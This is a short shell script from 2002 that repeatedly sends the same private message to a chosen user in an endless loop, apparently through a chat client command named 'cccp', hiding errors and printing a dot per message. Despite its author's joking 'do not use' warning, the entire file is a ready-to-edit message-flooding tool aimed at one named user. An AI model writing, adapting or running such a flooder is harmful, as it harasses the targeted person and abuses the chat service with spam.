#!/bin/sh
#by cunni@linux.nu - 2002
#warning.. very lame.. do not use

#set this to the user you are flooding
user=hejhopp

#what important message do you want to send to him
msg="droppen som urhlkar stenen"

echo "INFO: this is very lame script that floods a user with priv messages"
echo "please edit the file before using"
echo "hit enter to start och CTRL-c to exit"

while [ 1 ]
do
	cccp -O -p $user $msg 2> /dev/null 
	echo -n . 
done
